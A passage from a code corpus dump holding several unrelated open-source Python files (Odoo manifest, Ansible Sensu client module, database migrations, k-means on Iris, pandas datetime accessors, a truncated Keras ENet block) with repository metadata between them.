'author': "AvanzOSC",
'website': "http://www.avanzosc.es",
'contributors': [
"Ana Juaristi <anajuaristi@avanzosc.es>",
"Alfredo de la Fuente <alfredodelafuente@avanzosc.es",
],
"category": "Customer Relationship Management",
"depends": [
'partner_contact_birthdate',
],
"data": [
'views/res_partner_view.xml',
],
"installable": True,
}
|
alfredoavanzosc/odoo-addons
|
partner_contact_birthdate_age/__openerp__.py
|
Python
|
agpl-3.0
| 640 | 0 |
#!/usr/bin/python
# (c) 2017, Red Hat Inc.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'
}
DOCUMENTATION = '''
---
module: sensu_client
author: "David Moreau Simard (@dmsimard)"
short_description: Manages Sensu client configuration
version_added: 2.4
description:
- Manages Sensu client configuration.
- 'For more information, refer to the Sensu documentation: U(https://sensuapp.org/docs/latest/reference/clients.html)'
options:
state:
description:
- Whether the client should be present or not
choices: [ 'present', 'absent' ]
required: False
default: present
name:
description:
- A unique name for the client. The name cannot contain special characters or spaces.
required: False
default: System hostname as determined by Ruby Socket.gethostname (provided by Sensu)
address:
description:
- An address to help identify and reach the client. This is only informational, usually an IP address or hostname.
required: False
default: Non-loopback IPv4 address as determined by Ruby Socket.ip_address_list (provided by Sensu)
subscriptions:
description:
- An array of client subscriptions, a list of roles and/or responsibilities assigned to the system (e.g. webserver).
- These subscriptions determine which monitoring checks are executed by the client, as check requests are sent to subscriptions.
- The subscriptions array items must be strings.
required: True
default: null
safe_mode:
description:
- If safe mode is enabled for the client. Safe mode requires local check definitions in order to accept a check request and execute the check.
choices: [ 'true', 'false' ]
required: False
default: false
redact:
description:
- Client definition attributes to redact (values) when logging and sending client keepalives.
required: False
default: null
socket:
description:
- The socket definition scope, used to configure the Sensu client socket.
required: False
default: null
keepalives:
description:
- If Sensu should monitor keepalives for this client.
choices: [ 'true', 'false' ]
required: False
default: true
keepalive:
description:
- The keepalive definition scope, used to configure Sensu client keepalives behavior (e.g. keepalive thresholds, etc).
required: False
default: null
registration:
description:
- The registration definition scope, used to configure Sensu registration event handlers.
required: False
default: null
deregister:
description:
- If a deregistration event should be created upon Sensu client process stop.
choices: [ 'true', 'false' ]
required: False
default: false
deregistration:
description:
- The deregistration definition scope, used to configure automated Sensu client de-registration.
required: False
default: null
ec2:
description:
- The ec2 definition scope, used to configure the Sensu Enterprise AWS EC2 integration (Sensu Enterprise users only).
required: False
default: null
chef:
description:
- The chef definition scope, used to configure the Sensu Enterprise Chef integration (Sensu Enterprise users only).
required: False
default: null
puppet:
description:
- The puppet definition scope, used to configure the Sensu Enterprise Puppet integration (Sensu Enterprise users only).
required: False
default: null
servicenow:
description:
- The servicenow definition scope, used to configure the Sensu Enterprise ServiceNow integration (Sensu Enterprise users only).
required: False
default: null
notes:
- Check mode is supported
requirements: [ ]
'''
EXAMPLES = '''
# Minimum possible configuration
- name: Configure Sensu client
sensu_client:
subscriptions:
- default
# With customization
- name: Configure Sensu client
sensu_client:
name: "{{ ansible_fqdn }}"
address: "{{ ansible_default_ipv4['address'] }}"
subscriptions:
- default
- webserver
redact:
- password
socket:
bind: 127.0.0.1
port: 3030
keepalive:
thresholds:
warning: 180
critical: 300
handlers:
- email
custom:
- broadcast: irc
occurrences: 3
register: client
notify:
- Restart sensu-client
- name: Secure Sensu client configuration file
file:
path: "{{ client['file'] }}"
owner: "sensu"
group: "sensu"
mode: "0600"
- name: Delete the Sensu client configuration
sensu_client:
state: "absent"
'''
RETURN = '''
config:
description: Effective client configuration, when state is present
returned: success
type: dict
sample: {'name': 'client', 'subscriptions': ['default']}
file:
description: Path to the client configuration file
returned: success
type: string
sample: "/etc/sensu/conf.d/client.json"
'''
import json
import os
from ansible.module_utils.basic import AnsibleModule
def main():
module = AnsibleModule(
supports_check_mode=True,
argument_spec=dict(
state=dict(type='str', required=False, choices=['present', 'absent'], default='present'),
name=dict(type='str', required=False),
address=dict(type='str', required=False),
subscriptions=dict(type='list', required=False),
safe_mode=dict(type='bool', required=False, default=False),
redact=dict(type='list', required=False),
socket=dict(type='dict', required=False),
keepalives=dict(type='bool', required=False, default=True),
keepalive=dict(type='dict', required=False),
registration=dict(type='dict', required=False),
deregister=dict(type='bool', required=False),
deregistration=dict(type='dict', required=False),
ec2=dict(type='dict', required=False),
chef=dict(type='dict', required=False),
puppet=dict(type='dict', required=False),
servicenow=dict(type='dict', required=False)
),
required_if=[
['state', 'present', ['subscriptions']]
]
)
state = module.params['state']
path = "/etc/sensu/conf.d/client.json"
if state == 'absent':
if os.path.exists(path):
if module.check_mode:
msg = '{path} would have been deleted'.format(path=path)
module.exit_json(msg=msg, changed=True)
else:
try:
os.remove(path)
msg = '{path} deleted successfully'.format(path=path)
module.exit_json(msg=msg, changed=True)
except OSError as e:
msg = 'Exception when trying to delete {path}: {exception}'
module.fail_json(
msg=msg.format(path=path, exception=str(e)))
else:
# Idempotency: it's okay if the file doesn't exist
msg = '{path} already does not exist'.format(path=path)
module.exit_json(msg=msg)
# Build client configuration from module arguments
config = {'client': {}}
args = ['name', 'address', 'subscriptions', 'safe_mode', 'redact',
'socket', 'keepalives', 'keepalive', 'registration', 'deregister',
'deregistration', 'ec2', 'chef', 'puppet', 'servicenow']
for arg in args:
if arg in module.params and module.params[arg] is not None:
config['client'][arg] = module.params[arg]
# Load the current config, if there is one, so we can compare
current_config = None
try:
current_config = json.load(open(path, 'r'))
except (IOError, ValueError):
# File either doesn't exist or it's invalid JSON
pass
if current_config is not None and current_config == config:
# Config is the same, let's not change anything
module.exit_json(msg='Client configuration is already up to date',
config=config['client'],
file=path)
# Validate that directory exists before trying to write to it
if not module.check_mode and not os.path.exists(os.path.dirname(path)):
try:
os.makedirs(os.path.dirname(path))
except OSError as e:
module.fail_json(msg='Unable to create {0}: {1}'.format(os.path.dirname(path),
str(e)))
if module.check_mode:
module.exit_json(msg='Client configuration would have been updated',
changed=True,
config=config['client'],
file=path)
try:
with open(path, 'w') as client:
client.write(json.dumps(config, indent=4))
module.exit_json(msg='Client configuration updated',
changed=True,
config=config['client'],
file=path)
except (OSError, IOError) as e:
module.fail_json(msg='Unable to write file {0}: {1}'.format(path,
str(e)))
if __name__ == '__main__':
main()
|
jbenden/ansible
|
lib/ansible/modules/monitoring/sensu_client.py
|
Python
|
gpl-3.0
| 9,506 | 0.002525 |
import subprocess
subprocess.call("""
adb -d shell am start -n com.android.gallery/com.android.camera.GalleryPicker
""")
|
carabri/carabri
|
test_script/open_gallery.py
|
Python
|
apache-2.0
| 123 | 0 |
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Page'
db.create_table('wiki_page', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('parent', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='children', null=True, to=orm['wiki.Page'])),
('title', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('slug', self.gf('django.db.models.fields.SlugField')(max_length=50, db_index=True)),
('permission', self.gf('django.db.models.fields.IntegerField')(default=0)),
))
db.send_create_signal('wiki', ['Page'])
# Adding model 'Revision'
db.create_table('wiki_revision', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('page', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['wiki.Page'])),
('text', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['wiki.Text'], null=True, blank=True)),
('comment', self.gf('django.db.models.fields.CharField')(max_length=255, blank=True)),
('pub_date', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now, blank=True)),
('author', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'], null=True, blank=True)),
('author_ip', self.gf('django.db.models.fields.IPAddressField')(max_length=15, null=True, blank=True)),
))
db.send_create_signal('wiki', ['Revision'])
# Adding model 'Text'
db.create_table('wiki_text', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('content', self.gf('django.db.models.fields.TextField')(blank=True)),
))
db.send_create_signal('wiki', ['Text'])
def backwards(self, orm):
# Deleting model 'Page'
db.delete_table('wiki_page')
# Deleting model 'Revision'
db.delete_table('wiki_revision')
# Deleting model 'Text'
db.delete_table('wiki_text')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'wiki.page': {
'Meta': {'object_name': 'Page'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'children'", 'null': 'True', 'to': "orm['wiki.Page']"}),
'permission': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '50', 'db_index': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'})
},
'wiki.revision': {
'Meta': {'ordering': "('-pub_date',)", 'object_name': 'Revision'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'author_ip': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'comment': ('django.db.models.fields.CharField', [], {'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Page']"}),
'pub_date': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now', 'blank': 'True'}),
'text': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['wiki.Text']", 'null': 'True', 'blank': 'True'})
},
'wiki.text': {
'Meta': {'object_name': 'Text'},
'content': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['wiki']
|
kylef/lithium
|
lithium/wiki/migrations/0001_initial.py
|
Python
|
bsd-2-clause
| 7,245 | 0.008144 |
# Copyright 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from alembic import op
import sqlalchemy as sa
from sqlalchemy import sql
"""quota_usage
Revision ID: 45f955889773
Revises: 8675309a5c4f
Create Date: 2015-04-17 08:09:37.611546
"""
# revision identifiers, used by Alembic.
revision = '45f955889773'
down_revision = '8675309a5c4f'
def upgrade():
op.create_table(
'quotausages',
sa.Column('tenant_id', sa.String(length=255),
nullable=False, primary_key=True, index=True),
sa.Column('resource', sa.String(length=255),
nullable=False, primary_key=True, index=True),
sa.Column('dirty', sa.Boolean(), nullable=False,
server_default=sql.false()),
sa.Column('in_use', sa.Integer(), nullable=False,
server_default='0'),
sa.Column('reserved', sa.Integer(), nullable=False,
server_default='0'))
|
noironetworks/neutron
|
neutron/db/migration/alembic_migrations/versions/liberty/expand/45f955889773_quota_usage.py
|
Python
|
apache-2.0
| 1,496 | 0 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2013 PolyBeacon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from sqlalchemy import Column
from sqlalchemy import DateTime
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import UniqueConstraint
from ripcord.openstack.common import log as logging
LOG = logging.getLogger(__name__)
def upgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
quota = Table(
'quotas', meta,
Column('id', Integer, primary_key=True, autoincrement=True),
Column('created_at', DateTime),
Column('hard_limit', Integer),
Column('project_id', String(length=255)),
Column('resource', String(length=255), nullable=False),
Column('updated_at', DateTime),
UniqueConstraint(
'project_id', 'resource',
name='uniq_quotas0project_id0resource'),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
quota_class = Table(
'quota_classes', meta,
Column('id', Integer, primary_key=True, autoincrement=True),
Column('class_name', String(length=255)),
Column('created_at', DateTime),
Column('hard_limit', Integer),
Column('resource', String(length=255)),
Column('updated_at', DateTime),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
tables = [quota, quota_class]
for table in tables:
try:
table.create()
except Exception as e:
LOG.exception(e)
meta.drop_all(tables=tables)
raise
def downgrade(migrate_engine):
meta = MetaData()
meta.bind = migrate_engine
quota = Table('quotas', meta, autoload=True)
quota_class = Table('quota_classes', meta, autoload=True)
tables = [quota, quota_class]
for table in tables:
table.drop()
|
kickstandproject/ripcord
|
ripcord/db/sqlalchemy/migrate_repo/versions/006_add_quota_support.py
|
Python
|
apache-2.0
| 2,465 | 0 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Oct 18 20:53:35 2017
@author: sitibanc
"""
import numpy as np
import random
from sklearn import datasets
from scipy import stats
def kmeans(sample, K, max_iter):
N = sample.shape[0] # N筆資料
D = sample.shape[1] # 每筆資料有N維
C = np.zeros((K, D)) # K個中心點
L = np.zeros((N, 1)) # Label (data屬於哪一個cluster)
L1 = np.zeros((N, 1)) # 重新分群計算出的label
dist = np.zeros((N, K))
# Random select center
idx = random.sample(range(N), K)
C = sample[idx, :]
iteration = 0
while iteration <= max_iter:
for i in range(K):
#以整個矩陣做運算,求與C(中心點)距離
# np.tile() --> 垂直Repeat C[i, :] N次,水平repeat 1次
dist[:, i] = np.sum((sample - np.tile(C[i, :], (N, 1))) ** 2 , 1)
# 取距離最短者的input為其label
L1 = np.argmin(dist, 1)
# 若分群後各群成員不再改變(已分完,所屬cluster已定),則跳出迴圈
if iteration > 0 and np.array_equal(L, L1):
break
# Update Label L
L = L1
# 計算重新分群後的新center
for i in range(K):
# 取出屬於第i群者的index
idx = np.nonzero(L == i)[0] # np.nonzero()亦即True
if len(idx) > 0:
C[i, :] = np.mean(sample[idx, :], 0) # 沿垂直方向(0)計算平均
iteration += 1
# Calcuate wicd(within cluster distance, 群內每筆資料與群中心的距離)
wicd = np.sum(np.sqrt(np.sum((sample - C[L, :]) ** 2 , 1)))
return C, L, wicd
# Practice 3 : Iris Dataset Clustering Using K-Means
data = datasets.load_iris()
feature = data.data
center, label, wicd = kmeans(feature, 3, 1000)
# Calculate Error Rate
error = 0
for i in range(len(label)):
if i < 50:
mode = stats.mode(label[:50])
if label[i] != mode[0][0]:
error += 1
elif i < 100:
mode = stats.mode(label[50:100])
if label[i] != mode[0][0]:
error += 1
else:
mode = stats.mode(label[100:])
if label[i] != mode[0][0]:
error += 1
print('Error rate :', error / len(label))
|
SitiBanc/1061_NCTU_IOMDS
|
1018/Course Material/1018_2.py
|
Python
|
apache-2.0
| 2,416 | 0.003714 |
from .taxii.exceptions import UnauthorizedStatus
class UnauthorizedException(UnauthorizedStatus):
pass
class InvalidAuthHeader(Exception):
pass
|
Intelworks/OpenTAXII
|
opentaxii/exceptions.py
|
Python
|
bsd-3-clause
| 157 | 0 |
from magpie.utils import get_logger
LOGGER = get_logger(__name__)
def includeme(config):
LOGGER.info("Adding API routes...")
# Add all the admin ui routes
config.include("magpie.api.home")
config.include("magpie.api.login")
config.include("magpie.api.management")
config.include("magpie.api.swagger")
|
Ouranosinc/Magpie
|
magpie/api/__init__.py
|
Python
|
apache-2.0
| 329 | 0 |
class User:
def __init__(self, name):
self.name = name
|
syncloud/platform
|
src/syncloud_platform/rest/model/user.py
|
Python
|
gpl-3.0
| 67 | 0 |
"""
datetimelike delegation
"""
from __future__ import annotations
from typing import TYPE_CHECKING
import warnings
import numpy as np
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_datetime64_dtype,
is_datetime64tz_dtype,
is_integer_dtype,
is_list_like,
is_period_dtype,
is_timedelta64_dtype,
)
from pandas.core.dtypes.generic import ABCSeries
from pandas.core.accessor import (
PandasDelegate,
delegate_names,
)
from pandas.core.arrays import (
DatetimeArray,
PeriodArray,
TimedeltaArray,
)
from pandas.core.base import (
NoNewAttributesMixin,
PandasObject,
)
from pandas.core.indexes.datetimes import DatetimeIndex
from pandas.core.indexes.timedeltas import TimedeltaIndex
if TYPE_CHECKING:
from pandas import Series
class Properties(PandasDelegate, PandasObject, NoNewAttributesMixin):
_hidden_attrs = PandasObject._hidden_attrs | {
"orig",
"name",
}
def __init__(self, data: Series, orig):
if not isinstance(data, ABCSeries):
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
self._parent = data
self.orig = orig
self.name = getattr(data, "name", None)
self._freeze()
def _get_values(self):
data = self._parent
if is_datetime64_dtype(data.dtype):
return DatetimeIndex(data, copy=False, name=self.name)
elif is_datetime64tz_dtype(data.dtype):
return DatetimeIndex(data, copy=False, name=self.name)
elif is_timedelta64_dtype(data.dtype):
return TimedeltaIndex(data, copy=False, name=self.name)
elif is_period_dtype(data.dtype):
return PeriodArray(data, copy=False)
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
def _delegate_property_get(self, name):
from pandas import Series
values = self._get_values()
result = getattr(values, name)
# maybe need to upcast (ints)
if isinstance(result, np.ndarray):
if is_integer_dtype(result):
result = result.astype("int64")
elif not is_list_like(result):
return result
result = np.asarray(result)
if self.orig is not None:
index = self.orig.index
else:
index = self._parent.index
# return the result as a Series, which is by definition a copy
result = Series(result, index=index, name=self.name).__finalize__(self._parent)
# setting this object will show a SettingWithCopyWarning/Error
result._is_copy = (
"modifications to a property of a datetimelike "
"object are not supported and are discarded. "
"Change values on the original."
)
return result
def _delegate_property_set(self, name, value, *args, **kwargs):
raise ValueError(
"modifications to a property of a datetimelike object are not supported. "
"Change values on the original."
)
def _delegate_method(self, name, *args, **kwargs):
from pandas import Series
values = self._get_values()
method = getattr(values, name)
result = method(*args, **kwargs)
if not is_list_like(result):
return result
result = Series(result, index=self._parent.index, name=self.name).__finalize__(
self._parent
)
# setting this object will show a SettingWithCopyWarning/Error
result._is_copy = (
"modifications to a method of a datetimelike "
"object are not supported and are discarded. "
"Change values on the original."
)
return result
@delegate_names(
delegate=DatetimeArray, accessors=DatetimeArray._datetimelike_ops, typ="property"
)
@delegate_names(
delegate=DatetimeArray, accessors=DatetimeArray._datetimelike_methods, typ="method"
)
class DatetimeProperties(Properties):
"""
Accessor object for datetimelike properties of the Series values.
Examples
--------
>>> seconds_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="s"))
>>> seconds_series
0 2000-01-01 00:00:00
1 2000-01-01 00:00:01
2 2000-01-01 00:00:02
dtype: datetime64[ns]
>>> seconds_series.dt.second
0 0
1 1
2 2
dtype: int64
>>> hours_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="h"))
>>> hours_series
0 2000-01-01 00:00:00
1 2000-01-01 01:00:00
2 2000-01-01 02:00:00
dtype: datetime64[ns]
>>> hours_series.dt.hour
0 0
1 1
2 2
dtype: int64
>>> quarters_series = pd.Series(pd.date_range("2000-01-01", periods=3, freq="q"))
>>> quarters_series
0 2000-03-31
1 2000-06-30
2 2000-09-30
dtype: datetime64[ns]
>>> quarters_series.dt.quarter
0 1
1 2
2 3
dtype: int64
Returns a Series indexed like the original Series.
Raises TypeError if the Series does not contain datetimelike values.
"""
def to_pydatetime(self) -> np.ndarray:
"""
Return the data as an array of native Python datetime objects.
Timezone information is retained if present.
.. warning::
Python's datetime uses microsecond resolution, which is lower than
pandas (nanosecond). The values are truncated.
Returns
-------
numpy.ndarray
Object dtype array containing native Python datetime objects.
See Also
--------
datetime.datetime : Standard library value for a datetime.
Examples
--------
>>> s = pd.Series(pd.date_range('20180310', periods=2))
>>> s
0 2018-03-10
1 2018-03-11
dtype: datetime64[ns]
>>> s.dt.to_pydatetime()
array([datetime.datetime(2018, 3, 10, 0, 0),
datetime.datetime(2018, 3, 11, 0, 0)], dtype=object)
pandas' nanosecond precision is truncated to microseconds.
>>> s = pd.Series(pd.date_range('20180310', periods=2, freq='ns'))
>>> s
0 2018-03-10 00:00:00.000000000
1 2018-03-10 00:00:00.000000001
dtype: datetime64[ns]
>>> s.dt.to_pydatetime()
array([datetime.datetime(2018, 3, 10, 0, 0),
datetime.datetime(2018, 3, 10, 0, 0)], dtype=object)
"""
return self._get_values().to_pydatetime()
@property
def freq(self):
return self._get_values().inferred_freq
def isocalendar(self):
"""
Returns a DataFrame with the year, week, and day calculated according to
the ISO 8601 standard.
.. versionadded:: 1.1.0
Returns
-------
DataFrame
with columns year, week and day
See Also
--------
Timestamp.isocalendar : Function return a 3-tuple containing ISO year,
week number, and weekday for the given Timestamp object.
datetime.date.isocalendar : Return a named tuple object with
three components: year, week and weekday.
Examples
--------
>>> ser = pd.to_datetime(pd.Series(["2010-01-01", pd.NaT]))
>>> ser.dt.isocalendar()
year week day
0 2009 53 5
1 <NA> <NA> <NA>
>>> ser.dt.isocalendar().week
0 53
1 <NA>
Name: week, dtype: UInt32
"""
return self._get_values().isocalendar().set_index(self._parent.index)
@property
def weekofyear(self):
"""
The week ordinal of the year.
.. deprecated:: 1.1.0
Series.dt.weekofyear and Series.dt.week have been deprecated.
Please use Series.dt.isocalendar().week instead.
"""
warnings.warn(
"Series.dt.weekofyear and Series.dt.week have been deprecated. "
"Please use Series.dt.isocalendar().week instead.",
FutureWarning,
stacklevel=2,
)
week_series = self.isocalendar().week
week_series.name = self.name
if week_series.hasnans:
return week_series.astype("float64")
return week_series.astype("int64")
week = weekofyear
@delegate_names(
delegate=TimedeltaArray, accessors=TimedeltaArray._datetimelike_ops, typ="property"
)
@delegate_names(
delegate=TimedeltaArray,
accessors=TimedeltaArray._datetimelike_methods,
typ="method",
)
class TimedeltaProperties(Properties):
"""
Accessor object for datetimelike properties of the Series values.
Returns a Series indexed like the original Series.
Raises TypeError if the Series does not contain datetimelike values.
Examples
--------
>>> seconds_series = pd.Series(
... pd.timedelta_range(start="1 second", periods=3, freq="S")
... )
>>> seconds_series
0 0 days 00:00:01
1 0 days 00:00:02
2 0 days 00:00:03
dtype: timedelta64[ns]
>>> seconds_series.dt.seconds
0 1
1 2
2 3
dtype: int64
"""
def to_pytimedelta(self) -> np.ndarray:
"""
Return an array of native `datetime.timedelta` objects.
Python's standard `datetime` library uses a different representation
timedelta's. This method converts a Series of pandas Timedeltas
to `datetime.timedelta` format with the same length as the original
Series.
Returns
-------
numpy.ndarray
Array of 1D containing data with `datetime.timedelta` type.
See Also
--------
datetime.timedelta : A duration expressing the difference
between two date, time, or datetime.
Examples
--------
>>> s = pd.Series(pd.to_timedelta(np.arange(5), unit="d"))
>>> s
0 0 days
1 1 days
2 2 days
3 3 days
4 4 days
dtype: timedelta64[ns]
>>> s.dt.to_pytimedelta()
array([datetime.timedelta(0), datetime.timedelta(days=1),
datetime.timedelta(days=2), datetime.timedelta(days=3),
datetime.timedelta(days=4)], dtype=object)
"""
return self._get_values().to_pytimedelta()
@property
def components(self):
"""
Return a Dataframe of the components of the Timedeltas.
Returns
-------
DataFrame
Examples
--------
>>> s = pd.Series(pd.to_timedelta(np.arange(5), unit='s'))
>>> s
0 0 days 00:00:00
1 0 days 00:00:01
2 0 days 00:00:02
3 0 days 00:00:03
4 0 days 00:00:04
dtype: timedelta64[ns]
>>> s.dt.components
days hours minutes seconds milliseconds microseconds nanoseconds
0 0 0 0 0 0 0 0
1 0 0 0 1 0 0 0
2 0 0 0 2 0 0 0
3 0 0 0 3 0 0 0
4 0 0 0 4 0 0 0
"""
return (
self._get_values()
.components.set_index(self._parent.index)
.__finalize__(self._parent)
)
@property
def freq(self):
return self._get_values().inferred_freq
@delegate_names(
delegate=PeriodArray, accessors=PeriodArray._datetimelike_ops, typ="property"
)
@delegate_names(
delegate=PeriodArray, accessors=PeriodArray._datetimelike_methods, typ="method"
)
class PeriodProperties(Properties):
"""
Accessor object for datetimelike properties of the Series values.
Returns a Series indexed like the original Series.
Raises TypeError if the Series does not contain datetimelike values.
Examples
--------
>>> seconds_series = pd.Series(
... pd.period_range(
... start="2000-01-01 00:00:00", end="2000-01-01 00:00:03", freq="s"
... )
... )
>>> seconds_series
0 2000-01-01 00:00:00
1 2000-01-01 00:00:01
2 2000-01-01 00:00:02
3 2000-01-01 00:00:03
dtype: period[S]
>>> seconds_series.dt.second
0 0
1 1
2 2
3 3
dtype: int64
>>> hours_series = pd.Series(
... pd.period_range(start="2000-01-01 00:00", end="2000-01-01 03:00", freq="h")
... )
>>> hours_series
0 2000-01-01 00:00
1 2000-01-01 01:00
2 2000-01-01 02:00
3 2000-01-01 03:00
dtype: period[H]
>>> hours_series.dt.hour
0 0
1 1
2 2
3 3
dtype: int64
>>> quarters_series = pd.Series(
... pd.period_range(start="2000-01-01", end="2000-12-31", freq="Q-DEC")
... )
>>> quarters_series
0 2000Q1
1 2000Q2
2 2000Q3
3 2000Q4
dtype: period[Q-DEC]
>>> quarters_series.dt.quarter
0 1
1 2
2 3
3 4
dtype: int64
"""
class CombinedDatetimelikeProperties(
DatetimeProperties, TimedeltaProperties, PeriodProperties
):
def __new__(cls, data: Series):
# CombinedDatetimelikeProperties isn't really instantiated. Instead
# we need to choose which parent (datetime or timedelta) is
# appropriate. Since we're checking the dtypes anyway, we'll just
# do all the validation here.
if not isinstance(data, ABCSeries):
raise TypeError(
f"cannot convert an object of type {type(data)} to a datetimelike index"
)
orig = data if is_categorical_dtype(data.dtype) else None
if orig is not None:
data = data._constructor(
orig.array,
name=orig.name,
copy=False,
dtype=orig._values.categories.dtype,
index=orig.index,
)
if is_datetime64_dtype(data.dtype):
return DatetimeProperties(data, orig)
elif is_datetime64tz_dtype(data.dtype):
return DatetimeProperties(data, orig)
elif is_timedelta64_dtype(data.dtype):
return TimedeltaProperties(data, orig)
elif is_period_dtype(data.dtype):
return PeriodProperties(data, orig)
raise AttributeError("Can only use .dt accessor with datetimelike values")
|
dsm054/pandas
|
pandas/core/indexes/accessors.py
|
Python
|
bsd-3-clause
| 14,627 | 0.001641 |
# coding=utf-8
from keras.layers.advanced_activations import PReLU
from keras.layers.convolutional import Conv2D, ZeroPadding2D
from keras.layers.core import SpatialDropout2D, Permute
from keras.layers.merge import add, concatenate
from keras.layers.normalization import BatchNormalization
from ..layers.pooling import MaxPoolingWithArgmax2D
def initial_block(inp, nb_filter=13, nb_row=3, nb_col=3, strides=(2, 2)):
conv = Conv2D(nb_filter, (nb_row, nb_col), padding='same', strides=strides)(inp)
max_pool, indices = MaxPoolingWithArgmax2D()(inp)
merged = concatenate([conv, max_pool], axis=3)
return merged, indices
def bottleneck(inp, output, internal_scale=4, asymmetric=0, dilated=0, downsample=False, dropout_rate=0.1):
# main branch
internal = output // internal_scale
encoder = inp
# 1x1
input_stride = 2 if downsample else 1 # the 1st 1x1 projection is replaced with a 2x2 convolution when downsampling
encoder = Conv2D(internal, (input_stride, input_stride),
# padding='same',
strides=(input_stride, input_stride), use_bias=False)(encoder)
